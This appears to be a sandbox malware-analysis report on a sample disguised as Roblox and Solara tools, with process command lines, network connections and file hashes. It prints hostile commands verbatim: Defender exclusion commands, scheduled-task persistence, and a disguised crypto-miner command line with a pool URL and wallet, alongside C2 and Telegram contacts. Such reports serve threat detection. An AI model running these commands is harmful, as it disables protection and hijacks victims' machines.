schtasks.exe /create /tn "Roblox" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 10 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Config.Msi/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriversavessessionDlldhcp/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/winNet/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\fontdrvhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Roblox.exe'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ZCBMNmhnaO.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\winNet\ComContainerbrowserRefRuntime.exe

"C:\winNet\ComContainerbrowserRefRuntime.exe"

C:\Users\Admin\Bloxstrap.exe

C:\Users\Admin\Bloxstrap.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\5tk1CddJ7G.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\fontdrvhost.exe

"C:\Users\Admin\AppData\Local\fontdrvhost.exe"

C:\winNet\ComContainerbrowserRefRuntime.exe

"C:\winNet\ComContainerbrowserRefRuntime.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost64"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding D401E69C13BB41A3D6E2E185386A0405 E Global\MSI0000

C:\Windows\SysWOW64\wevtutil.exe

"wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man"

C:\Windows\System32\wevtutil.exe

"wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man" /fromwow64

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa38bd855 /state1:0x41c64e6d

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 www.nodejs.org udp
US 104.20.23.46:443 www.nodejs.org tcp
US 8.8.8.8:53 46.23.20.104.in-addr.arpa udp
US 8.8.8.8:53 nodejs.org udp
US 104.20.22.46:443 nodejs.org tcp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 46.22.20.104.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 729231cm.n9shteam1.top udp
FI 77.105.133.52:80 729231cm.n9shteam1.top tcp
FI 77.105.133.52:80 729231cm.n9shteam1.top tcp
US 8.8.8.8:53 52.133.105.77.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 ozero.top udp
FI 77.105.133.52:80 ozero.top tcp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 papka.top udp
US 172.67.169.72:80 papka.top tcp
FI 77.105.133.52:80 ozero.top tcp
US 8.8.8.8:53 72.169.67.172.in-addr.arpa udp
FI 77.105.133.52:80 ozero.top tcp
US 172.67.169.72:80 papka.top tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 66.229.138.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Youtube.exe

MD5 d25ebdfc04bdadea74017fa72f90781f
SHA1 f7278c4d04fc4db888368e0245d7607d8bcbb557
SHA256 9f30de67eacb0138506eff3c67dc9c52b0e923416dc75722ac90b12210b5383f
SHA512 77cca4e741a6f96cc35a3ce55c3f899f902719c8ee29c84a6f5dcb57e9d6b8f85cad2042486ff907046f3c87673f5a34da73730256822d090ae764ba21064e71

C:\Users\Admin\AppData\Local\Temp\Solara.exe

MD5 7b28675a325913598db8609260143c47
SHA1 c8095976bd1e2170bd237a9d263252726cfb88c6
SHA256 788b9469441c3c0becdea77fe2d7ed71dea46b50cb8352f17d2f919246294cdd
SHA512 7e26c5472f34a8a3055170a630d058c79cfe0af3205497650ddc8f4b8f796e3ff93cfa97dc0a652691d14ebf91e17eef9bfc300f9108f9133bf2ecadda279556

memory/5088-18-0x0000000000400000-0x0000000000D88000-memory.dmp

memory/976-21-0x00007FFB59933000-0x00007FFB59935000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Result.exe

MD5 170b43350048ed4b6fca0e50a0178621
SHA1 db863b7b04a7c58baa9120e2f184517ed27a7252
SHA256 248856f33f34ee7f97fd2a83264d4c85251f06bce6d5761d416405a33849079b
SHA512 e8dc07cf863d01e5ae18b44432cbf3ae54cd24f12d00981a5b5df51684039783339f7b43f79816d25790210654b3da17eae4687f2a3b34b6e2570c5ce990bde7

C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe

MD5 7d4b84a8c3d14cb3d1bb864719463404
SHA1 544cf51aec717c63552f0fdf97d364b1b62a7a0c
SHA256 3aa0597b5d053594cce551ac5d8a9bc83059c3d55ef024dc7dff59c73a88e663
SHA512 d962cbe9998d2e04a9bbd2ab1a97535409015b183acc0d61d49f6b696eac046e7c41028b55c8d33c3b6c1dacbf3704771dbdf911b06c8e9c247b49d2c6864a29

memory/976-28-0x00000000009F0000-0x0000000000A68000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

MD5 36b62ba7d1b5e149a2c297f11e0417ee
SHA1 ce1b828476274375e632542c4842a6b002955603
SHA256 8353c5ace62fda6aba330fb3396e4aab11d7e0476f815666bd96a978724b9e0c
SHA512 fddec44631e7a800abf232648bbf417969cd5cc650f32c17b0cdc12a0a2afeb9a5dbf5c1f899bd2fa496bd22307bfc8d1237c94920fceafd84f47e13a6b98b94

C:\Users\Admin\AppData\Local\Temp\Solara.exe

MD5 1797c0e37f4b9dd408cbf0d7bfcb7c95
SHA1 10df695351ac6074e23a3d3b4bd31a17c10fd614
SHA256 8a1b256aa65d666d8b566576c86065bb9401483f705bce0c597fc27b9cde2cfb
SHA512 52289cb15c7b2c5a600da9e9894f5dbc66566eff9c864488dfd8d318800fbbf8622a3dad79f7f5aec6d77badfc0707010ffffe521eef8f218be33e07092010b1

C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe

MD5 7529e4004c0fe742df146464e6aeadb0
SHA1 ae7341ee066b31de5a1a1a25851b70ced41de13f
SHA256 a80a68f1b63391ba9a91870173a0db962c73950c191594750e705f1d1c77be81
SHA512 d50112143b1a2acf918606e2f0a1d01fc2d5ed3e2e4ecdcdb2405669af2444a3274c7e39461c723d675e230f8cb72be351cdb1b8e31b9f5b5517a03c66f47f27

memory/3412-58-0x0000000000400000-0x000000000069B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Frage build.exe

MD5 11fdce42422f8ed518fedf290f5bfc3c
SHA1 f18a4ad694af5ba50a7697b4cb66308454c555d9
SHA256 b62b6592549d56b573efdd053c73e37542742301fffbeb786a60c227564b97a3
SHA512 4e1c700ed33db9b29fe3545efeb7616ccf9c86b0716ee684d5375097651b44b3aab99302e6e159bb3f088b4cb59334aa473864d3d8b43a583b3cbfd9a12d16ae

memory/1380-76-0x0000000000400000-0x0000000000CC7000-memory.dmp

memory/4376-79-0x00000000003F0000-0x00000000004BE000-memory.dmp

memory/4376-80-0x0000000005370000-0x0000000005914000-memory.dmp

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe

MD5 1a3448b944b91cebda73adc5064e6286
SHA1 4f8716c6e56a675944a5f0f250947c8d45a362e1
SHA256 5b489dab912970289bd0bfb41928010990288e7a3ec8acb18f637e670c50e0e5
SHA512 b355ffb98b0744cc6a1baaff7645c862344b12cfc251a1a243da666f7d41f8eea8b6a179faaeb600ffd4b4ce51b8c3f942c0cc6bd06875a4b80440468ce63795

C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe

MD5 3492e48fb2e9fb2bfc18658e3d8f88bd
SHA1 34cec8222aedc8baf774aa863a041a23971c7631
SHA256 c0857f8c479b8fa90402a735a24b312819cdcec5c69b90bd6dafc175dbfd3b2e
SHA512 a9923e942d86d3e29a52d421ceb96c8cef8aae769cbb18a65e93793e444cf7712c52aaba3a5da2f06d2ee5c3eef42d6972457b13aa06a060eaf9b26369d0efc9

C:\winNet\we9fgyC144zVOkGk.vbe

MD5 aa1a085aba94a5fc38c26b79a2217336
SHA1 f847af2aec7fd56fe8734ccb51d8027b9b4e817b
SHA256 f66e935da9738cbddac905b9b55a2cfe5003aab76863b180a28e42238cbaa545
SHA512 75f66a848dc09ea859d7ddad59f6d7cac148936340eef14c4ad6cec7d4d92cf0c32bdaf911c0d943e7c478445118852180bdaceb72d9d4aae919f99cd6538981

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat

MD5 83a7f739f51f1acd83f143afa6ec1533
SHA1 2f653f906842f8f507d02f81550eb26a35f38acc
SHA256 5faae2c746c71afcb3dc0b9eb4fbf6087786936484f62ee08412a94c13642545
SHA512 c4487c0ca0e630ee8daf2443c290fac2d0de60b0ce36c28e6451cfd66b2b81669a87726da31d4e172d2794a0345bbe9111402486b6e28d941fb6d124be604793

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe

MD5 9cf4017a8383ae846a908c79a28354bf
SHA1 adbe6a02b90147431e80fc38100de42d88dd765a
SHA256 bc7ea8011a8098690cf8976f14533fdbd5a0532818ed30365ef5412a256516f2
SHA512 490a19bdd35657a50e72f2c133c8d731cf1cccd14dc4ce9648d22f486540edd9f7448eb4d2840d52bd7601c52036572937b4c79bc32206eb98b7dc76765d1f00

memory/4556-109-0x00000000001E0000-0x0000000000364000-memory.dmp

memory/4556-110-0x0000000000BC0000-0x0000000000BCE000-memory.dmp

memory/4556-115-0x0000000000BA0000-0x0000000000BB0000-memory.dmp

memory/4556-117-0x00000000025D0000-0x00000000025DE000-memory.dmp

memory/4556-116-0x00000000025C0000-0x00000000025CE000-memory.dmp

memory/4556-114-0x00000000025A0000-0x00000000025B6000-memory.dmp

memory/4556-113-0x0000000000B90000-0x0000000000B98000-memory.dmp

memory/4556-112-0x000000001B0A0000-0x000000001B0F0000-memory.dmp

memory/4556-111-0x0000000000B70000-0x0000000000B8C000-memory.dmp

memory/4556-119-0x0000000002710000-0x000000000271C000-memory.dmp

memory/4556-118-0x0000000002700000-0x000000000270A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi

MD5 0e4e9aa41d24221b29b19ba96c1a64d0
SHA1 231ade3d5a586c0eb4441c8dbfe9007dc26b2872
SHA256 5bfb6f3ab89e198539408f7e0e8ec0b0bd5efe8898573ec05b381228efb45a5d
SHA512 e6f27aecead72dffecbeaad46ebdf4b1fd3dbcddd1f6076ba183b654e4e32d30f7af1236bf2e04459186e993356fe2041840671be73612c8afed985c2c608913

memory/4172-161-0x0000028EFE060000-0x0000028EFE082000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2ixj4ntk.moe.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Windows\Installer\MSIB093.tmp

MD5 9fe9b0ecaea0324ad99036a91db03ebb
SHA1 144068c64ec06fc08eadfcca0a014a44b95bb908
SHA256 e2cce64916e405976a1d0c522b44527d12b1cba19de25da62121cf5f41d184c9
SHA512 906641a73d69a841218ae90b83714a05af3537eec8ad1d761f58ac365cf005bdd74ad88f71c4437aaa126ac74fa46bcad424d17c746ab197eec2caa1bd838176

C:\Windows\Installer\MSIB20C.tmp

MD5 a3ae5d86ecf38db9427359ea37a5f646
SHA1 eb4cb5ff520717038adadcc5e1ef8f7c24b27a90
SHA256 c8d190d5be1efd2d52f72a72ae9dfa3940ab3faceb626405959349654fe18b74
SHA512 96ecb3bc00848eeb2836e289ef7b7b2607d30790ffd1ae0e0acfc2e14f26a991c6e728b8dc67280426e478c70231f9e13f514e52c8ce7d956c1fad0e322d98e0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6c47b3f4e68eebd47e9332eebfd2dd4e
SHA1 67f0b143336d7db7b281ed3de5e877fa87261834
SHA256 8c48b1f2338e5b24094821f41121d2221f1cb3200338f46df49f64d1c4bc3e0c
SHA512 0acf302a9fc971ef9df65ed42c47ea17828e54dff685f4434f360556fd27cdc26a75069f00dcdc14ba174893c6fd7a2cfd8c6c07be3ce35dafee0a006914eaca

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e243a38635ff9a06c87c2a61a2200656
SHA1 ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc
SHA256 af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f
SHA512 4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

memory/5888-272-0x0000019D22C20000-0x0000019D22E41000-memory.dmp

memory/5888-273-0x0000019D3D6E0000-0x0000019D3D900000-memory.dmp

memory/5888-274-0x0000019D24BA0000-0x0000019D24BB2000-memory.dmp

C:\Windows\Installer\MSICB91.tmp

MD5 7a86ce1a899262dd3c1df656bff3fb2c
SHA1 33dcbe66c0dc0a16bab852ed0a6ef71c2d9e0541
SHA256 b8f2d0909d7c2934285a8be010d37c0609c7854a36562cbfcbce547f4f4c7b0c
SHA512 421e8195c47381de4b3125ab6719eec9be7acd2c97ce9247f4b70a309d32377917c9686b245864e914448fe53df2694d5ee5f327838d029989ba7acafda302ec

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cae60f0ddddac635da71bba775a2c5b4
SHA1 386f1a036af61345a7d303d45f5230e2df817477
SHA256 b2dd636b7b0d3bfe44cef5e1175828b1fa7bd84d5563f54342944156ba996c16
SHA512 28ed8a8bc132ef56971cfd7b517b17cdb74a7f8c247ef6bff232996210075e06aa58a415825a1e038cfb547ad3dc6882bf1ca1b68c5b360ef0512a1440850253

C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat

MD5 81c6a00913630266cef3d07065db9b1f
SHA1 db6260ef38563ec05f910277af358fbaa2387154
SHA256 5898912e30972853e1b8ee628e9c300f25c5959d11e6b91b6454ddc19e328cf4
SHA512 a643512ca118e8745ae8aafb010bb21099ba0a358eb8a951471cc5092e14c51ffafae0c288d84ddcda5eaad2a3e93b30ecd205bfe0938a21f05e6c87ead3cb36

memory/3228-306-0x000000001D8A0000-0x000000001DA62000-memory.dmp

C:\winNet\ComContainerbrowserRefRuntime.exe

MD5 e41ef428aaa4841f258a38dc1cc305ef
SHA1 edf3a17831e013b74479e2e635b8cf0c1b3787ce
SHA256 6c02076f8f42678e0576a71ff170ed84b203a0e5e9a31bda9aed912822f25995
SHA512 a92a30077601aaf34a05ceaab5738ad2aa585498868bb6b675dd43d332c46424c859ed19cf0159b04fcf7b4da3b773e37ca064e8975a43964cc6a654661f46bd

memory/5336-310-0x0000000000BF0000-0x0000000000D86000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\oensqgEQyM.bat

MD5 293d9566fdf946163a7c10e0e9941af7
SHA1 ed32a62f79ce8dbc1586b5bf0721e3607b16a507
SHA256 e81692b039e1c113d0f4c71f9a04ca597cfe8c82da961bfae9440aac9366b189
SHA512 6b42e832adc4bac6d0909ce14e4fed6a18603ed9df7ecc53da9854e64f49281aee5af53076ef80f021551a0cdb5067cfaca276922967c247577785195ea6b891

memory/3228-328-0x000000001E2A0000-0x000000001E7C8000-memory.dmp

C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat

MD5 1689f0727433844f3250241e9e030427
SHA1 bac7909c2a8e7a666edb56a7df07650701d9c013
SHA256 fa50cc35b05b88a91212dba6ca7cb348368309e9fdfa16273d1adc659f42cdab
SHA512 d814a8015dcce43a0128c7a5c34998a9a7df03231c5c2b1df169e8986de6e8ec1e77692756ada79f8355abaa50c35ccf5d5f2eaa13c76e02a4dd582ce9c51528

C:\DriversavessessionDlldhcp\Roblox.exe

MD5 26e388ea32df635cd424decb2bff563e
SHA1 510ac8024dd524f7ebc92210b189804921fd29ee
SHA256 cf90b0e7318a9e4e3cbaeebd3f82f823e7754a35e689979fabd18e785383dc8e
SHA512 b59ecb856064e3d590ec3d0f17410195bf08cd6a2b0bb091c92c9200c3e163f5b0e918b09f7ff0f51990dae49ba27ea566862353647ee59ae9ea9c192faf79d1

memory/1176-333-0x0000000000280000-0x000000000045A000-memory.dmp

memory/1176-335-0x00000000023E0000-0x00000000023EE000-memory.dmp

memory/1176-337-0x000000001AFB0000-0x000000001AFCC000-memory.dmp

memory/1176-339-0x000000001AFD0000-0x000000001AFE8000-memory.dmp

memory/1176-341-0x0000000002500000-0x000000000250C000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\fndgbpbq\fndgbpbq.cmdline

MD5 7320e1e4d0afd9c785757030cc3aa7ea
SHA1 2b77e248314315e8d2007c4c04e4f83eca66b392
SHA256 dab9aa32e5a0d0c7431dfd281d57ff37c57a254ab819e2a8feef4be09b5bcdfe
SHA512 987a3db351363522861c00dc6f55f1a15df3159fbd49ed73ab530003f2f22f22d10e2135b4a40ffdf9b6667c20682a6eb767aace1d70c022c4e15d72d339007a

\??\c:\Users\Admin\AppData\Local\Temp\fndgbpbq\fndgbpbq.0.cs

MD5 a58a757ecfe01384d231971348228f8f
SHA1 fa459abb3d37031460e19a603fa092d6d91a0c4c
SHA256 5a4978dc4e8682b26a68c5563dbd73d34f10545b9129aa242b9c705f804f861a
SHA512 f68f9f5da60b42ee16f10d307d9a9de6b168b2b54d8dea519f016be3112adeaf1cb40522306fc18cfa9a339169e5820f39334f266f5183ad9ab9c1a1fa49a94a

\??\c:\Windows\Globalization\CSC2CD0480A80E4347B591AF5A63AD67F8.TMP

MD5 70ebd87a449c83d0645ba22e10ab83e5
SHA1 5980251d5a46d81e6f48fe53ee04e87a28219015
SHA256 b4713f585dbd4185833afeb466a2fbaa5c9d17071f9de2a1f0dfeec01b346c01
SHA512 b44a0154a6c4b1f2af61046a0357b8018a5095262f0ec54e701f4bd46adcaad3e88bafe23567e49b845bd83578d0291bcff6a43351d6027ea02c9e1ead96ca66

C:\Users\Admin\AppData\Local\Temp\RESEB69.tmp

MD5 1b8397189f6a495740655f00fe70ffb8
SHA1 4953646f2a39b1f5dc088fb2d68b59cbcbd5ebd2
SHA256 5dbbfddca1bb3bd3128eaeeb746151145129a9d8be86ce0e681e36fca62d08ca
SHA512 06ba2e6d2c64d0b000a36abe0bb987ca4846bb55b5a7ea6a0a53f0ae86f33f7c4d181e09fbcf089438b95526054a635ad52e18e51a430aaed8484af04ce80a7d

\??\c:\Users\Admin\AppData\Local\Temp\gajwrdcm\gajwrdcm.0.cs

MD5 d35e54f45eb5995d6740cdd271394369
SHA1 3d76192df2fdde62f2e6ef5ffd62ab96faa5b163
SHA256 d1edfd6c2a97f287404719baf709427165bfd53a9ed50815c54559b5f9e70069
SHA512 20efe17b8953b13ff8f66e330740c0d3ea9018cc90fcbbe90b826103bad23824f26549d2c0b56279b210175728200790049e4025e6f45da599138351389a1e90

\??\c:\Users\Admin\AppData\Local\Temp\gajwrdcm\gajwrdcm.cmdline

MD5 2310f0d098d541a2d921edf287fffca3
SHA1 9970817de75b46dc6b0864c6f78660832a69a086
SHA256 b3a835533f7554d4c335a13bb4d7baefcd62f070d1bff85f98a5c3aefe8f5f91
SHA512 d0281ef387500808b6f55f93b0c93498d2e46a8624a7029d34dc63e45372525d6295dab695dd9a8915c8a0b51eec4831fd458615cc7449997f794af05fe1d734

\??\c:\Program Files (x86)\Internet Explorer\en-US\CSC303836A264394C678FCD25C781BA961.TMP

MD5 780929fe2feb53fb270143ab0691854b
SHA1 be3e8b5c1d5a2897e95e7d00420b738c3bc311b4
SHA256 1367fb29f1eed5f5360fc57d0f73955ab54997791757fde595e53df3df43dac7
SHA512 7c30065be290afb2351786dd8900fd128dd822592d8c73959f0eb1ee633fef3e140f7ed5b54b16c747d7410b3486bc798136224b5ad923bad4fdf491e97ee272

C:\Users\Admin\AppData\Local\Temp\RESEC06.tmp

MD5 a4c1dd24cedc4327d3a40aacc69b0867
SHA1 2266040aa46ccab274037ed6c5d8666b00757e3c
SHA256 fa6bbdd2fd1e5c069588c19769018ed268e0d034d60dfa4611ad8e2fe8e77873
SHA512 5ddd9caaae329a5f861251779540164b4f98bf648f0a5d593dc68fbb635a16cfb33c69f2b0d8525ec823571f3690d5e8c455f9fd766801c599bdd2988e0122f5

\??\c:\Users\Admin\AppData\Local\Temp\xxy4xula\xxy4xula.cmdline

MD5 20715e86c94c5130e3fa4dd4e1bed37f
SHA1 b9d7f52a38ec5010d64ae62bfa2ca2b7c66a15c3
SHA256 4deab6e626076fb95208bc07549b85ba6b016dc0640ea5b5edb9f22acf47c4fe
SHA512 7ee2e254ad01207e2d7573c437bfb13061669164c0fe3cdaf7fdebadd22135892e05e4626802c5f278c01a90159c0ffe6104338bc46f1ecaba794daaf349d182

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 c1a4a4340b4aaf6b72487d4d011fdee9
SHA1 c1a25eeeb340d226fa996fd8b6e9559d3112b4c5
SHA256 858259d792411041f71a344c219b120bd494de51529259dac6846ae8e7e9bc19
SHA512 76316cb27ac8729ab8f972229c25e521213295c2a6b21b073cb9b258b056e85facd86754abbf1a7e89b7516a1a184b6826a078ddb56f4c9bb2de5c3844929f37

memory/4764-674-0x0000000002800000-0x0000000002820000-memory.dmp

memory/4764-669-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4764-673-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4764-683-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4764-687-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4764-685-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4764-684-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4764-686-0x0000000140000000-0x0000000140786000-memory.dmp

C:\Program Files\nodejs\node_modules\npm\node_modules\nopt\LICENSE

MD5 b020de8f88eacc104c21d6e6cacc636d
SHA1 20b35e641e3a5ea25f012e13d69fab37e3d68d6b
SHA256 3f24d692d165989cd9a00fe35ca15a2bc6859e3361fa42aa20babd435f2e4706
SHA512 4220617e29dd755ad592295bc074d6bc14d44a1feeed5101129669f3ecf0e34eaa4c7c96bbc83da7352631fa262baab45d4a370dad7dabec52b66f1720c28e38

C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\LICENSE

MD5 d2cf52aa43e18fdc87562d4c1303f46a
SHA1 58fb4a65fffb438630351e7cafd322579817e5e1
